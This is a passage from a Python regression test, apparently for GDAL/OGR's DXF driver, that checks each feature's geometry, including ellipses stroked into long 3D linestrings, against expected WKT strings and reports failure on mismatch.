7.07692307692308,7.23076923076923 7.23076923076923,7.38461538461539 7.38461538461539,7.53846153846154 7.53846153846154,7.69230769230769 7.69230769230769,7.84615384615385 7.84615384615385,8 8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):11
# EntityHandle (String) = 201
# LINESTRING (8 1,7.62837370825536 0.987348067229724,7.25775889681215 0.975707614760869,6.88916704597178 0.966090122894857,6.52360963603567 0.959507071933107,6.16209814730525 0.956969942177043,5.80564406008193 0.959490213928084,5.45525885466714 0.968079367487651,5.11195401136229 0.983748883157167,4.77674101046882 1.00751024123805,4.45063133228814 1.04037492203173,4.13463645712167 1.08335440583961,3.82976786527082 1.13746017296313,3.53703703703704 1.2037037037037,3.25745545272173 1.28309647836275,2.99203459262631 1.37664997724169,2.74178593705221 1.48537568064195,2.50772096630085 1.61028506886495,2.29085116067365 1.75238962221211,2.09218800047203 1.91270082098484,1.91270082098485 2.09218800047202,1.75238962221211 2.29085116067364,1.61028506886495 2.50772096630085,1.48537568064195 2.74178593705221,1.37664997724169 2.99203459262631,1.28309647836275 3.25745545272172,1.2037037037037 3.53703703703703,1.13746017296313 3.82976786527082,1.08335440583961 4.13463645712166,1.04037492203173 4.45063133228814,1.00751024123805 4.77674101046882,0.983748883157167 5.11195401136229,0.968079367487652 5.45525885466714,0.959490213928084 5.80564406008193,0.956969942177043 6.16209814730525,0.959507071933108 6.52360963603567,0.966090122894857 6.88916704597178,0.975707614760869 7.25775889681216,0.987348067229724 7.62837370825537,1 8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (8 1,7.62837370825536 0.987348067229724,7.25775889681215 0.975707614760869,6.88916704597178 0.966090122894857,6.52360963603567 0.959507071933107,6.16209814730525 0.956969942177043,5.80564406008193 0.959490213928084,5.45525885466714 0.968079367487651,5.11195401136229 0.983748883157167,4.77674101046882 1.00751024123805,4.45063133228814 1.04037492203173,4.13463645712167 1.08335440583961,3.82976786527082 1.13746017296313,3.53703703703704 1.2037037037037,3.25745545272173 1.28309647836275,2.99203459262631 1.37664997724169,2.74178593705221 1.48537568064195,2.50772096630085 1.61028506886495,2.29085116067365 1.75238962221211,2.09218800047203 1.91270082098484,1.91270082098485 2.09218800047202,1.75238962221211 2.29085116067364,1.61028506886495 2.50772096630085,1.48537568064195 2.74178593705221,1.37664997724169 2.99203459262631,1.28309647836275 3.25745545272172,1.2037037037037 3.53703703703703,1.13746017296313 3.82976786527082,1.08335440583961 4.13463645712166,1.04037492203173 4.45063133228814,1.00751024123805 4.77674101046882,0.983748883157167 5.11195401136229,0.968079367487652 5.45525885466714,0.959490213928084 5.80564406008193,0.956969942177043 6.16209814730525,0.959507071933108 6.52360963603567,0.966090122894857 6.88916704597178,0.975707614760869 7.25775889681216,0.987348067229724 7.62837370825537,1 8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):12
# EntityHandle (String) = 202
# POINT Z (7 7 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (7 7 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):13
# EntityHandle (String) = 203
# POINT Z (-4 4 -5e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-4 4 -5e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):14
# EntityHandle (String) = 204
# LINESTRING Z (0 0 0,-1 1 -1e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,-1 1 -1e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):15
# EntityHandle (String) = 205
# LINESTRING (-1 1,-2 1,-1 2,-1 1)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-1 1,-2 1,-1 2,-1 1)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):16
# EntityHandle (String) = 206
# LINESTRING Z (-1 1 -1e-16,-1 2 -1e-16,-2 2 -2e-16,-1 1 -1e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-1 1 -1e-16,-1 2 -1e-16,-2 2 -2e-16,-1 1 -1e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):17
# EntityHandle (String) = 20B
# LINESTRING Z (-6 4 -6e-16,-5.99512810051965 3.86048705251175 -5.99512810051965e-16,-5.98053613748314 3.72165379807987 -5.98053613748314e-16,-5.95629520146761 3.58417661836448 -5.95629520146761e-16,-5.92252339187664 3.448725288366 -5.92252339187664e-16,-5.87938524157182 3.31595971334866 -5.87938524157182e-16,-5.8270909152852 3.1865267138484 -5.8270909152852e-16,-5.76589518571785 3.06105687442822 -5.76589518571785e-16,-5.69609619231285 2.94016147153359 -5.69609619231285e-16,-5.61803398874989 2.82442949541505 -5.61803398874989e-16,-5.53208888623796 2.71442478062692 -5.53208888623796e-16,-5.4386796006773 2.61068325908201 -5.4386796006773e-16,-5.33826121271772 2.51371034904521 -5.33826121271772e-16,-5.23132295065132 2.42397849278656 -5.23132295065132e-16,-5.11838580694149 2.34192485488992 -5.11838580694149e-16,-5.0 2.26794919243112 -5e-16,-4.87674229357815 2.20241190740167 -4.87674229357815e-16,-4.74921318683182 2.14563229086643 -4.74921318683182e-16,-4.61803398874989 2.09788696740969 -4.61803398874989e-16,-4.48384379119934 2.05940854744801 -4.48384379119934e-16,-4.34729635533386 2.03038449397558 -4.34729635533386e-16,-4.20905692653531 2.01095620926345 -4.20905692653531e-16,-4.069798993405 2.00121834596181 -4.069798993405e-16,-3.930201006595 2.00121834596181 -3.930201006595e-16,-3.79094307346469 2.01095620926345 -3.79094307346469e-16,-3.65270364466614 2.03038449397558 -3.65270364466614e-16,-3.51615620880066 2.05940854744801 -3.51615620880066e-16,-3.38196601125011 2.09788696740969 -3.3819660112501e-16,-3.25078681316818 2.14563229086643 -3.25078681316818e-16,-3.12325770642185 2.20241190740167 -3.12325770642185e-16,-3.0 2.26794919243112 -3e-16,-2.88161419305851 2.34192485488992 -2.88161419305851e-16,-2.76867704934868 2.42397849278656 -2.76867704934868e-16,-2.66173878728228 2.51371034904521 -2.66173878728228e-16,-2.5613203993227 2.61068325908201 -2.5613203993227e-16,-2.46791111376204 2.71442478062692 -2.46791111376204e-16,-2.38196601125011 2.82442949541505 
-2.3819660112501e-16,-2.30390380768715 2.94016147153359 -2.30390380768715e-16,-2.23410481428215 3.06105687442822 -2.23410481428215e-16,-2.1729090847148 3.1865267138484 -2.1729090847148e-16,-2.12061475842818 3.31595971334866 -2.12061475842818e-16,-2.07747660812336 3.448725288366 -2.07747660812336e-16,-2.04370479853239 3.58417661836448 -2.04370479853239e-16,-2.01946386251686 3.72165379807987 -2.01946386251686e-16,-2.00487189948035 3.86048705251175 -2.00487189948035e-16,-2.0 4.0 -2e-16,-2.00487189948035 4.13951294748825 -2.00487189948035e-16,-2.01946386251686 4.27834620192013 -2.01946386251686e-16,-2.04370479853239 4.41582338163552 -2.04370479853239e-16,-2.07747660812336 4.551274711634 -2.07747660812336e-16,
# -2.12061475842818 4.68404028665134 -2.12061475842818e-16,-2.1729090847148 4.8134732861516 -2.1729090847148e-16,-2.23410481428215 4.93894312557178 -2.23410481428215e-16,-2.30390380768715 5.05983852846641 -2.30390380768715e-16,-2.38196601125011 5.17557050458495 -2.3819660112501e-16,-2.46791111376204 5.28557521937308 -2.46791111376204e-16,-2.5613203993227 5.38931674091799 -2.5613203993227e-16,-2.66173878728228 5.48628965095479 -2.66173878728228e-16,-2.76867704934868 5.57602150721344 -2.76867704934868e-16,-2.88161419305851 5.65807514511008 -2.88161419305851e-16,-3.0 5.73205080756888 -3e-16,-3.12325770642184 5.79758809259833 -3.12325770642184e-16,-3.25078681316818 5.85436770913357 -3.25078681316817e-16,-3.38196601125011 5.90211303259031 -3.3819660112501e-16,-3.51615620880066 5.94059145255199 -3.51615620880066e-16,-3.65270364466614 5.96961550602442 -3.65270364466614e-16,-3.79094307346469 5.98904379073655 -3.79094307346469e-16,-3.930201006595 5.99878165403819 -3.930201006595e-16,-4.069798993405 5.99878165403819 -4.069798993405e-16,-4.20905692653531 5.98904379073655 -4.20905692653531e-16,-4.34729635533386 5.96961550602442 -4.34729635533386e-16,-4.48384379119933 5.94059145255199 -4.48384379119933e-16,-4.61803398874989 5.90211303259031 -4.61803398874989e-16,-4.74921318683182 5.85436770913357 -4.74921318683182e-16,-4.87674229357815 5.79758809259833 -4.87674229357815e-16,-5.0 5.73205080756888 -5e-16,-5.11838580694149 5.65807514511008 -5.11838580694149e-16,-5.23132295065132 5.57602150721344 -5.23132295065132e-16,-5.33826121271772 5.48628965095479 -5.33826121271772e-16,-5.4386796006773 5.389316740918 -5.4386796006773e-16,-5.53208888623796 5.28557521937308 -5.53208888623796e-16,-5.61803398874989 5.17557050458495 -5.61803398874989e-16,-5.69609619231285 5.05983852846641 -5.69609619231285e-16,-5.76589518571785 4.93894312557178 -5.76589518571785e-16,-5.8270909152852 4.8134732861516 -5.8270909152852e-16,-5.87938524157182 4.68404028665134 -5.87938524157182e-16,-5.92252339187664 
4.551274711634 -5.92252339187664e-16,-5.95629520146761 4.41582338163552 -5.95629520146761e-16,-5.98053613748314 4.27834620192013 -5.98053613748314e-16,-5.99512810051965 4.13951294748825 -5.99512810051965e-16,-6.0 4.0 -6e-16)
# Next entity (preceding the entities:18 dump below): a full ellipse stroked
# into a ~100-vertex LINESTRING Z. The expected WKT is the dump in the
# comment block above; it is split with '+' string concatenation because of
# its length.
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-6 4 -6e-16,-5.99512810051965 3.86048705251175 -5.99512810051965e-16,-5.98053613748314 3.72165379807987 -5.98053613748314e-16,-5.95629520146761 3.58417661836448 -5.95629520146761e-16,-5.92252339187664 3.448725288366 -5.92252339187664e-16,-5.87938524157182 3.31595971334866 -5.87938524157182e-16,-5.8270909152852 3.1865267138484 -5.8270909152852e-16,-5.76589518571785 3.06105687442822 -5.76589518571785e-16,-5.69609619231285 2.94016147153359 -5.69609619231285e-16,-5.61803398874989 2.82442949541505 -5.61803398874989e-16,-5.53208888623796 2.71442478062692 -5.53208888623796e-16,-5.4386796006773 2.61068325908201 -5.4386796006773e-16,-5.33826121271772 2.51371034904521 -5.33826121271772e-16,-5.23132295065132 2.42397849278656 -5.23132295065132e-16,-5.11838580694149 2.34192485488992 -5.11838580694149e-16,-5.0 2.26794919243112 -5e-16,-4.87674229357815 2.20241190740167 -4.87674229357815e-16,-4.74921318683182 2.14563229086643 -4.74921318683182e-16,-4.61803398874989 2.09788696740969 -4.61803398874989e-16,-4.48384379119934 2.05940854744801 -4.48384379119934e-16,-4.34729635533386 2.03038449397558 -4.34729635533386e-16,-4.20905692653531 2.01095620926345 -4.20905692653531e-16,-4.069798993405 2.00121834596181 -4.069798993405e-16,-3.930201006595 2.00121834596181 -3.930201006595e-16,-3.79094307346469 2.01095620926345 -3.79094307346469e-16,-3.65270364466614 2.03038449397558 -3.65270364466614e-16,-3.51615620880066 2.05940854744801 -3.51615620880066e-16,-3.38196601125011 2.09788696740969 -3.3819660112501e-16,-3.25078681316818 2.14563229086643 -3.25078681316818e-16,-3.12325770642185 2.20241190740167 -3.12325770642185e-16,-3.0 2.26794919243112 -3e-16,-2.88161419305851 2.34192485488992 -2.88161419305851e-16,-2.76867704934868 2.42397849278656 -2.76867704934868e-16,-2.66173878728228 2.51371034904521 -2.66173878728228e-16,-2.5613203993227 2.61068325908201 -2.5613203993227e-16,-2.46791111376204 2.71442478062692 
-2.46791111376204e-16,-2.38196601125011 2.82442949541505 -2.3819660112501e-16,-2.30390380768715 2.94016147153359 -2.30390380768715e-16,-2.23410481428215 3.06105687442822 -2.23410481428215e-16,-2.1729090847148 3.1865267138484 -2.1729090847148e-16,-2.12061475842818 3.31595971334866 -2.12061475842818e-16,-2.07747660812336 3.448725288366 -2.07747660812336e-16,-2.04370479853239 3.58417661836448 -2.04370479853239e-16,-2.01946386251686 3.72165379807987 -2.01946386251686e-16,-2.00487189948035 3.86048705251175 -2.00487189948035e-16,-2.0 4.0 -2e-16,-2.00487189948035 4.13951294748825 -2.00487189948035e-16,-2.01946386251686 4.27834620192013 -2.01946386251686e-16,-2.04370479853239 4.41582338163552 -2.04370479853239e-16,' + \
'-2.07747660812336 4.551274711634 -2.07747660812336e-16,-2.12061475842818 4.68404028665134 -2.12061475842818e-16,-2.1729090847148 4.8134732861516 -2.1729090847148e-16,-2.23410481428215 4.93894312557178 -2.23410481428215e-16,-2.30390380768715 5.05983852846641 -2.30390380768715e-16,-2.38196601125011 5.17557050458495 -2.3819660112501e-16,-2.46791111376204 5.28557521937308 -2.46791111376204e-16,-2.5613203993227 5.38931674091799 -2.5613203993227e-16,-2.66173878728228 5.48628965095479 -2.66173878728228e-16,-2.76867704934868 5.57602150721344 -2.76867704934868e-16,-2.88161419305851 5.65807514511008 -2.88161419305851e-16,-3.0 5.73205080756888 -3e-16,-3.12325770642184 5.79758809259833 -3.12325770642184e-16,-3.25078681316818 5.85436770913357 -3.25078681316817e-16,-3.38196601125011 5.90211303259031 -3.3819660112501e-16,-3.51615620880066 5.94059145255199 -3.51615620880066e-16,-3.65270364466614 5.96961550602442 -3.65270364466614e-16,-3.79094307346469 5.98904379073655 -3.79094307346469e-16,-3.930201006595 5.99878165403819 -3.930201006595e-16,-4.069798993405 5.99878165403819 -4.069798993405e-16,-4.20905692653531 5.98904379073655 -4.20905692653531e-16,-4.34729635533386 5.96961550602442 -4.34729635533386e-16,-4.48384379119933 5.94059145255199 -4.48384379119933e-16,-4.61803398874989 5.90211303259031 -4.61803398874989e-16,-4.74921318683182 5.85436770913357 -4.74921318683182e-16,-4.87674229357815 5.79758809259833 -4.87674229357815e-16,-5.0 5.73205080756888 -5e-16,-5.11838580694149 5.65807514511008 -5.11838580694149e-16,-5.23132295065132 5.57602150721344 -5.23132295065132e-16,-5.33826121271772 5.48628965095479 -5.33826121271772e-16,-5.4386796006773 5.389316740918 -5.4386796006773e-16,-5.53208888623796 5.28557521937308 -5.53208888623796e-16,-5.61803398874989 5.17557050458495 -5.61803398874989e-16,-5.69609619231285 5.05983852846641 -5.69609619231285e-16,-5.76589518571785 4.93894312557178 -5.76589518571785e-16,-5.8270909152852 4.8134732861516 -5.8270909152852e-16,-5.87938524157182 
4.68404028665134 -5.87938524157182e-16,-5.92252339187664 4.551274711634 -5.92252339187664e-16,-5.95629520146761 4.41582338163552 -5.95629520146761e-16,-5.98053613748314 4.27834620192013 -5.98053613748314e-16,-5.99512810051965 4.13951294748825 -5.99512810051965e-16,-6.0 4.0 -6e-16)'):
# check_feature_geometry returned nonzero: geometries differ. Dump the
# actual geometry for debugging, then report failure to the test harness.
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):18
# EntityHandle (String) = 20C
# LINESTRING Z (-2 4 -3e-16,-2.00487189948035 4.06975647374412 -3.00487189948035e-16,-2.01946386251686 4.13917310096007 -3.01946386251686e-16,-2.04370479853239 4.20791169081776 -3.04370479853239e-16,-2.07747660812336 4.275637355817 -3.07747660812336e-16,-2.12061475842818 4.34202014332567 -3.12061475842818e-16,-2.1729090847148 4.4067366430758 -3.1729090847148e-16,-2.23410481428215 4.46947156278589 -3.23410481428215e-16,-2.30390380768715 4.52991926423321 -3.30390380768715e-16,-2.38196601125011 4.58778525229247 -3.38196601125011e-16,-2.46791111376204 4.64278760968654 -3.46791111376204e-16,-2.5613203993227 4.694658370459 -3.5613203993227e-16,-2.66173878728228 4.74314482547739 -3.66173878728228e-16,-2.76867704934868 4.78801075360672 -3.76867704934868e-16,-2.88161419305851 4.82903757255504 -3.88161419305851e-16,-3.0 4.86602540378444 -4e-16,-3.12325770642185 4.89879404629917 -4.12325770642185e-16,-3.25078681316818 4.92718385456679 -4.25078681316818e-16,-3.38196601125011 4.95105651629515 -4.38196601125011e-16,-3.51615620880067 4.970295726276 -4.51615620880067e-16,-3.65270364466614 4.98480775301221 -4.65270364466614e-16,-3.79094307346469 4.99452189536827 -4.79094307346469e-16,-3.930201006595 4.9993908270191 -4.930201006595e-16,-4.069798993405 4.9993908270191 -5.069798993405e-16,-4.20905692653531 4.99452189536827 -5.20905692653531e-16,-4.34729635533386 4.98480775301221 -5.34729635533386e-16,-4.48384379119934 4.970295726276 -5.48384379119934e-16,-4.61803398874989 4.95105651629515 -5.6180339887499e-16,-4.74921318683182 4.92718385456679 -5.74921318683183e-16,-4.87674229357816 4.89879404629917 -5.87674229357816e-16,-5.0 4.86602540378444 -6e-16,-5.11838580694149 4.82903757255504 -6.1183858069415e-16,-5.23132295065132 4.78801075360672 -6.23132295065132e-16,-5.33826121271772 4.74314482547739 -6.33826121271772e-16,-5.4386796006773 4.694658370459 -6.4386796006773e-16,-5.53208888623796 4.64278760968654 -6.53208888623796e-16,-5.61803398874989 4.58778525229247 
-6.61803398874989e-16,-5.69609619231285 4.5299192642332 -6.69609619231285e-16,-5.76589518571785 4.46947156278589 -6.76589518571785e-16,-5.8270909152852 4.4067366430758 -6.8270909152852e-16,-5.87938524157182 4.34202014332567 -6.87938524157182e-16,-5.92252339187664 4.275637355817 -6.92252339187664e-16,-5.95629520146761 4.20791169081776 -6.95629520146761e-16,-5.98053613748314 4.13917310096006 -6.98053613748314e-16,-5.99512810051965 4.06975647374412 -6.99512810051965e-16,-6.0 4.0 -7e-16,-5.99512810051965 3.93024352625587 -6.99512810051965e-16,-5.98053613748314 3.86082689903993 -6.98053613748314e-16,-5.95629520146761 3.79208830918224 -6.95629520146761e-16,
# -5.92252339187664 3.724362644183 -6.92252339187664e-16,-5.87938524157182 3.65797985667433 -6.87938524157182e-16,-5.8270909152852 3.5932633569242 -6.8270909152852e-16,-5.76589518571785 3.53052843721411 -6.76589518571785e-16,-5.69609619231285 3.4700807357668 -6.69609619231285e-16,-5.61803398874989 3.41221474770753 -6.61803398874989e-16,-5.53208888623796 3.35721239031346 -6.53208888623796e-16,-5.4386796006773 3.305341629541 -6.4386796006773e-16,-5.33826121271772 3.25685517452261 -6.33826121271772e-16,-5.23132295065132 3.21198924639328 -6.23132295065132e-16,-5.11838580694149 3.17096242744496 -6.11838580694149e-16,-5.0 3.13397459621556 -6e-16,-4.87674229357815 3.10120595370083 -5.87674229357816e-16,-4.74921318683182 3.07281614543321 -5.74921318683182e-16,-4.61803398874989 3.04894348370485 -5.6180339887499e-16,-4.48384379119934 3.029704273724 -5.48384379119934e-16,-4.34729635533386 3.01519224698779 -5.34729635533386e-16,-4.20905692653531 3.00547810463173 -5.20905692653531e-16,-4.069798993405 3.0006091729809 -5.069798993405e-16,-3.930201006595 3.0006091729809 -4.930201006595e-16,-3.79094307346469 3.00547810463173 -4.79094307346469e-16,-3.65270364466614 3.01519224698779 -4.65270364466614e-16,-3.51615620880066 3.029704273724 -4.51615620880066e-16,-3.38196601125011 3.04894348370485 -4.38196601125011e-16,-3.25078681316818 3.07281614543321 -4.25078681316818e-16,-3.12325770642185 3.10120595370083 -4.12325770642185e-16,-3.0 3.13397459621556 -4e-16,-2.88161419305851 3.17096242744496 -3.88161419305851e-16,-2.76867704934868 3.21198924639328 -3.76867704934868e-16,-2.66173878728228 3.25685517452261 -3.66173878728228e-16,-2.5613203993227 3.305341629541 -3.5613203993227e-16,-2.46791111376204 3.35721239031346 -3.46791111376204e-16,-2.38196601125011 3.41221474770753 -3.38196601125011e-16,-2.30390380768715 3.4700807357668 -3.30390380768715e-16,-2.23410481428215 3.53052843721411 -3.23410481428215e-16,-2.1729090847148 3.5932633569242 -3.1729090847148e-16,-2.12061475842818 3.65797985667433 
-3.12061475842818e-16,-2.07747660812336 3.724362644183 -3.07747660812336e-16,-2.04370479853239 3.79208830918224 -3.04370479853239e-16,-2.01946386251686 3.86082689903993 -3.01946386251686e-16,-2.00487189948035 3.93024352625587 -3.00487189948035e-16,-2 4 -3e-16)
# OGRFeature(entities):18 (handle 20C): ellipse stroked into LINESTRING Z;
# expected WKT is the dump in the comment block above, split with '+'
# concatenation because of its length.
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2 4 -3e-16,-2.00487189948035 4.06975647374412 -3.00487189948035e-16,-2.01946386251686 4.13917310096007 -3.01946386251686e-16,-2.04370479853239 4.20791169081776 -3.04370479853239e-16,-2.07747660812336 4.275637355817 -3.07747660812336e-16,-2.12061475842818 4.34202014332567 -3.12061475842818e-16,-2.1729090847148 4.4067366430758 -3.1729090847148e-16,-2.23410481428215 4.46947156278589 -3.23410481428215e-16,-2.30390380768715 4.52991926423321 -3.30390380768715e-16,-2.38196601125011 4.58778525229247 -3.38196601125011e-16,-2.46791111376204 4.64278760968654 -3.46791111376204e-16,-2.5613203993227 4.694658370459 -3.5613203993227e-16,-2.66173878728228 4.74314482547739 -3.66173878728228e-16,-2.76867704934868 4.78801075360672 -3.76867704934868e-16,-2.88161419305851 4.82903757255504 -3.88161419305851e-16,-3.0 4.86602540378444 -4e-16,-3.12325770642185 4.89879404629917 -4.12325770642185e-16,-3.25078681316818 4.92718385456679 -4.25078681316818e-16,-3.38196601125011 4.95105651629515 -4.38196601125011e-16,-3.51615620880067 4.970295726276 -4.51615620880067e-16,-3.65270364466614 4.98480775301221 -4.65270364466614e-16,-3.79094307346469 4.99452189536827 -4.79094307346469e-16,-3.930201006595 4.9993908270191 -4.930201006595e-16,-4.069798993405 4.9993908270191 -5.069798993405e-16,-4.20905692653531 4.99452189536827 -5.20905692653531e-16,-4.34729635533386 4.98480775301221 -5.34729635533386e-16,-4.48384379119934 4.970295726276 -5.48384379119934e-16,-4.61803398874989 4.95105651629515 -5.6180339887499e-16,-4.74921318683182 4.92718385456679 -5.74921318683183e-16,-4.87674229357816 4.89879404629917 -5.87674229357816e-16,-5.0 4.86602540378444 -6e-16,-5.11838580694149 4.82903757255504 -6.1183858069415e-16,-5.23132295065132 4.78801075360672 -6.23132295065132e-16,-5.33826121271772 4.74314482547739 -6.33826121271772e-16,-5.4386796006773 4.694658370459 -6.4386796006773e-16,-5.53208888623796 4.64278760968654 -6.53208888623796e-16,-5.61803398874989 
4.58778525229247 -6.61803398874989e-16,-5.69609619231285 4.5299192642332 -6.69609619231285e-16,-5.76589518571785 4.46947156278589 -6.76589518571785e-16,-5.8270909152852 4.4067366430758 -6.8270909152852e-16,-5.87938524157182 4.34202014332567 -6.87938524157182e-16,-5.92252339187664 4.275637355817 -6.92252339187664e-16,-5.95629520146761 4.20791169081776 -6.95629520146761e-16,-5.98053613748314 4.13917310096006 -6.98053613748314e-16,-5.99512810051965 4.06975647374412 -6.99512810051965e-16,-6.0 4.0 -7e-16,-5.99512810051965 3.93024352625587 -6.99512810051965e-16,-5.98053613748314 3.86082689903993 -6.98053613748314e-16,-5.95629520146761 3.79208830918224 -6.95629520146761e-16,' + \
'-5.92252339187664 3.724362644183 -6.92252339187664e-16,-5.87938524157182 3.65797985667433 -6.87938524157182e-16,-5.8270909152852 3.5932633569242 -6.8270909152852e-16,-5.76589518571785 3.53052843721411 -6.76589518571785e-16,-5.69609619231285 3.4700807357668 -6.69609619231285e-16,-5.61803398874989 3.41221474770753 -6.61803398874989e-16,-5.53208888623796 3.35721239031346 -6.53208888623796e-16,-5.4386796006773 3.305341629541 -6.4386796006773e-16,-5.33826121271772 3.25685517452261 -6.33826121271772e-16,-5.23132295065132 3.21198924639328 -6.23132295065132e-16,-5.11838580694149 3.17096242744496 -6.11838580694149e-16,-5.0 3.13397459621556 -6e-16,-4.87674229357815 3.10120595370083 -5.87674229357816e-16,-4.74921318683182 3.07281614543321 -5.74921318683182e-16,-4.61803398874989 3.04894348370485 -5.6180339887499e-16,-4.48384379119934 3.029704273724 -5.48384379119934e-16,-4.34729635533386 3.01519224698779 -5.34729635533386e-16,-4.20905692653531 3.00547810463173 -5.20905692653531e-16,-4.069798993405 3.0006091729809 -5.069798993405e-16,-3.930201006595 3.0006091729809 -4.930201006595e-16,-3.79094307346469 3.00547810463173 -4.79094307346469e-16,-3.65270364466614 3.01519224698779 -4.65270364466614e-16,-3.51615620880066 3.029704273724 -4.51615620880066e-16,-3.38196601125011 3.04894348370485 -4.38196601125011e-16,-3.25078681316818 3.07281614543321 -4.25078681316818e-16,-3.12325770642185 3.10120595370083 -4.12325770642185e-16,-3.0 3.13397459621556 -4e-16,-2.88161419305851 3.17096242744496 -3.88161419305851e-16,-2.76867704934868 3.21198924639328 -3.76867704934868e-16,-2.66173878728228 3.25685517452261 -3.66173878728228e-16,-2.5613203993227 3.305341629541 -3.5613203993227e-16,-2.46791111376204 3.35721239031346 -3.46791111376204e-16,-2.38196601125011 3.41221474770753 -3.38196601125011e-16,-2.30390380768715 3.4700807357668 -3.30390380768715e-16,-2.23410481428215 3.53052843721411 -3.23410481428215e-16,-2.1729090847148 3.5932633569242 -3.1729090847148e-16,-2.12061475842818 3.65797985667433 
-3.12061475842818e-16,-2.07747660812336 3.724362644183 -3.07747660812336e-16,-2.04370479853239 3.79208830918224 -3.04370479853239e-16,-2.01946386251686 3.86082689903993 -3.01946386251686e-16,-2.00487189948035 3.93024352625587 -3.00487189948035e-16,-2 4 -3e-16)'):
# Geometry mismatch: dump the actual geometry to aid debugging, then fail.
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):19
# EntityHandle (String) = 20D
# LINESTRING Z (-2.0 2.0 -2e-16,-1.96657794502105 2.03582232791524 -1.96657794502105e-16,-1.93571660708646 2.07387296203834 -1.93571660708646e-16,-1.90756413746468 2.11396923855471 -1.90756413746468e-16,-1.88225568337755 2.15591867344963 -1.88225568337755e-16,-1.85991273921989 2.19951988653655 -1.85991273921989e-16,-1.84064256332004 2.24456356819194 -1.84064256332004e-16,-1.8245376630414 2.29083348415575 -1.8245376630414e-16,-1.81167535069652 2.33810751357387 -1.81167535069652e-16,-1.80211737240583 2.38615871529951 -1.80211737240583e-16,-1.79590961168258 2.43475641733454 -1.79590961168258e-16,-1.79308186916688 2.48366732418105 -1.79308186916688e-16,-1.79364771956639 2.53265663678705 -1.79364771956639e-16,-1.79760444649032 2.58148917971011 -1.79760444649032e-16,-1.80493305548955 2.62993053008785 -1.80493305548955e-16,-1.81559836524041 2.67774814299566 -1.81559836524041e-16,-1.8295491764342 2.72471246778926 -1.8295491764342e-16,-1.84671851756181 2.7705980500731 -1.84671851756181e-16,-1.86702396641357 2.81518461400453 -1.86702396641357e-16,-1.89036804575079 2.85825811973811 -1.89036804575079e-16,-1.91663869124976 2.89961179093366 -1.91663869124976e-16,-1.94570978947168 2.93904710739563 -1.94570978947168e-16,-1.97744178327594 2.97637475807832 -1.97744178327594e-16,-2.01168234177068 3.01141554988232 -2.01168234177068e-16,-2.04826709158413 3.04400126787917 -2.04826709158413e-16,-2.08702040594658 3.07397548283483 -2.08702040594658e-16,-2.12775624779472 3.10119430215541 -2.12775624779472e-16,-2.17027906285109 3.12552706065018 -2.17027906285109e-16,-2.2143847183914 3.14685694779575 -2.2143847183914e-16,-2.25986148319297 3.16508156849045 -2.25986148319297e-16,-2.30649104396024 3.18011343460661 -2.30649104396024e-16,-2.35404955334774 3.1918803849814 -2.35404955334774e-16,-2.40230870454951 3.20032593182975 -2.40230870454951e-16,-2.45103682729644 3.2054095319166 -2.45103682729644e-16,-2.5 3.20710678118655 -2.5e-16,-2.54896317270356 3.2054095319166 
-2.54896317270356e-16,-2.59769129545049 3.20032593182975 -2.59769129545049e-16,-2.64595044665226 3.1918803849814 -2.64595044665226e-16,-2.69350895603976 3.18011343460661 -2.69350895603976e-16,-2.74013851680703 3.16508156849045 -2.74013851680703e-16,-2.7856152816086 3.14685694779575 -2.7856152816086e-16,-2.8297209371489 3.12552706065018 -2.8297209371489e-16,-2.87224375220528 3.10119430215541 -2.87224375220528e-16,-2.91297959405342 3.07397548283483 -2.91297959405342e-16,-2.95173290841587 3.04400126787917 -2.95173290841587e-16,-2.98831765822932 3.01141554988232 -2.98831765822932e-16,-3.02255821672406 2.97637475807832 -3.02255821672406e-16,-3.05429021052832 2.93904710739563 -3.05429021052832e-16,-3.08336130875024 2.89961179093367 -3.08336130875024e-16,-3.10963195424921 2.85825811973811 -3.10963195424921e-16,-3.13297603358643 2.81518461400453 -3.13297603358643e-16,-3.15328148243819 2.7705980500731 -3.15328148243819e-16,-3.1704508235658 2.72471246778926 -3.1704508235658e-16,-3.18440163475959 2.67774814299567 -3.18440163475959e-16,-3.19506694451045 2.62993053008786 -3.19506694451045e-16,-3.20239555350968 2.58148917971011 -3.20239555350968e-16,-3.20635228043361 2.53265663678705 -3.20635228043361e-16,-3.20691813083312 2.48366732418105 -3.20691813083312e-16,-3.20409038831742 2.43475641733454 -3.20409038831742e-16,-3.19788262759417 2.38615871529951 -3.19788262759417e-16,-3.18832464930348 2.33810751357387 -3.18832464930349e-16,-3.1754623369586 2.29083348415575 -3.1754623369586e-16,-3.15935743667996 2.24456356819194 -3.15935743667996e-16,-3.14008726078011 2.19951988653655 -3.14008726078011e-16,-3.11774431662245 2.15591867344963 -3.11774431662245e-16,-3.09243586253532 2.11396923855472 -3.09243586253532e-16,-3.06428339291354 2.07387296203834 -3.06428339291354e-16,-3.03342205497895 2.03582232791524 -3.03342205497895e-16,-3 2 -3e-16)
# OGRFeature(entities):19 (handle 20D): ellipse stroked into LINESTRING Z;
# expected WKT taken from the dump in the comment block above.
feat = lyr.GetNextFeature()
